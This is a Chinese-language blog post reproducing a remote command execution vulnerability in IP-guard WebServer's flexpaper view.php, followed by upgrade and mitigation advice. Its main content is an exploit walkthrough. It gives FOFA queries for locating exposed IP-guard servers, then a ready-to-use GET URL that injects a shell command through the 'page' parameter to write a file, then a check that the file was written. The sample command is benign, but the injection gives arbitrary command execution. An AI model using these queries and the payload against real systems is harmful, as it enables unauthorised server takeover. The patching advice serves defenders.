当前位置: 首页 > news >正文

IP-guard WebServer 命令执行漏洞复现

简介

IP-guard是一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。在旧版本申请审批的文件预览功能用到了一个开源的插件 flexpaper,使用的这个插件版本存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,获取服务器控制权限。

影响版本:IP-guard<4.81.0307.0

漏洞复现

FOFA语法:
app="IP-guard"
或者
web.title="IP-guard"

访问页面如下所示:

POC:

/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+test+>test.txt

拼接URL进行get请求:

http://ip:port/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+test+>test.txt

从浏览器访问后会直接下载一个文件证明请求成功

访问POC:/ipg/static/appr/lib/flexpaper/php/test.txt

成功执行写入的命令

攻击者可以利用漏洞获取对服务器的控制权

修复建议

1、产品升级方案
官方已发布新版本修复漏洞,建议尽快访问官网(https://www.ip-guard.net/)或联系官方售后支持获取版本升级安装包或补丁,升级至4.81.0307.0及以上。
2、临时缓解措施

  1. 配置入侵检测系统(IDS)和入侵防御系统(IPS)以及Web应用防火墙(WAF),以识别和阻止这类特征的请求,从而保护系统免受此类远程命令执行攻击的影响;同时为了避免攻击者绕过安全设备实施攻击,建议尽快修复漏洞。
  2. 如非必要,不要将 IP-guard 放置在公网上。或通过网络ACL策略限制访问来源,例如只允许来自特定IP地址或地址段的访问请求。

免责声明

文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!!!


结语

没有人规定,一朵花一定要成长为向日葵或者玫瑰。

http://www.lryc.cn/news/233454.html

相关文章:

  • TensorFlow案例学习:图片风格迁移
  • 解密网络世界的秘密——Wireshark Mac/Win中文版网络抓包工具
  • 自学ansible笔记
  • 笔记53:torch.nn.rnn() 函数详解
  • 【Spring】使用三方包进行数据源对象(数据库)管理
  • EfficientNet:通过模型效率彻底改变深度学习
  • asp.net core mvc之 布局
  • 【QT HTTP】使用QtNetwork模块制作基于HTTP请求的C/S架构
  • R语言绘制精美图形 | 火山图 | 学习笔记
  • 远程创建分支本地VScode看不到分支
  • python后台框架简介
  • spring boot validation使用
  • Hadoop3.3.4分布式安装
  • SQL ALTER TABLE 语句||SQL AUTO INCREMENT 字段
  • 【源码系列】短剧系统开发国际版短剧系统软件平台介绍
  • JavaWeb[总结]
  • 如何解决小程序异步请求问题
  • NSSCTF第12页(3)
  • 基于ssm+vue交通事故档案系统
  • DNS1(Bind软件)
  • PDF自动打印
  • 【C#】类型转换-显式转换:括号强转、Parse法、Convert法、其他类型转string
  • 【智能家居】4、智能家居框架设计和代码文件工程建立
  • 【GAN】数据增强基础知识
  • Skywalking流程分析_3(服务的准备、启动、关闭)
  • mysql中的各种日志文件redo log、undo log和binlog
  • 【电视剧-长相思】经典语录
  • 串口通信原理及应用
  • python爬取穷游网景点评论
  • Phar 文件上传以及反序列化